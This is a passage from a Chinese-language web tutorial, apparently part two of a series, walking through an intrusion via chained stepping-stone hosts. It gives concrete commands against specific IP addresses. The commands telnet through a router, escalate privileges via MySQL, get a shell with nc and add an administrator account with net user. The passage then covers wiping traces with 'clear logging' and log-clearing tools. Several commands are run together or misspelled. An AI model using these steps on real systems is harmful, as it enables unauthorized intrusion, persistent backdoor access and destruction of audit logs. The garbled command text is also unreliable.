小胖网络知识大全
首页 | TAGS | QQ | 输入法 | Win7
  • 跳板攻击入侵技术实例解析 (2)

  •  

    侵者往往会放弃该跳板转而用其他的跳板。

    (3).第三跳,telnet主机

    在路由器特权模式下,输入telnet 203.115.*.85,随后输入用户名及其密码后就telnet到远程主机系统给我们一个shell。

    4.提权

    至此,我们经过三级跳到达工作平台,然后就在该shell上进行目标主机的MYSQL提权操作。操作平台上笔者已经准备好了进行MYSQL提权的工具。输入命令进行操作,笔者把相关的命令列举出来:

    cd msysqlcd binmysql -h 211.52.118.84 -uroot\. c:\mysql\bin\2003.txt

    在工作平台上再打开一个cmd,输入命令

    nc 211.52.118.84 3306

    即监听该ip的3306端口,返回一个目标主机的shell,获取该主机的控制权。

    在该shell上输入命令建立管理员用户

    net user test test /addnet localgour administrators test /add

    下面看看对方是否开了远程桌面连接,在命令行下敲入命令

    netstat -ano

    对方开3389端口,即可以进行远程桌面的连接。

    由于对方是XP系统,不能多用户远程连接,笔者的入侵检测到此为止。

    5、全身而退

    入侵完成获得目标主机的管理权限,入侵者就得擦除痕迹,准备撤退了。

    (1).由于从目标主机获得的shell反向连接获得的,不会有日志记录,所以不用管直接断开连接。

    (2).上传clearlog工具,清除telnet主机上的登陆日志。

    (3).输入exit,退出路由器到主机的的telnet连接。在路由器上输入

    clear logging

    分别用来清除登陆日志。

    (4).退出路由器登陆,通过工具清除远程桌面主机上的登陆日志,然后删除登录用帐户和用户目录,注销用户。

    总结:上面笔者结合实例演示了入侵者如何通过跳板进行入侵以及入侵善后的全过程,本文只是从技术的角度对跳板技术进行解析,目的是让有兴趣的读者直观地了解跳板技术的相关细节。当然,跳板技术是博大精深,远非本文所能囊括,但其基本原来都类似,希望文本对大家了解这种技术有所帮助。

  • TAGS:
  • 作者:管理员 时间:2009-5-30 来源:网络 人气:

热门TAGS


相关推荐

热门新闻

版权所有:小胖网络迷 www.209j.cn 2004-2009 All Rights Reserved.
站长QQ: 951969697 粤ICP备05096685号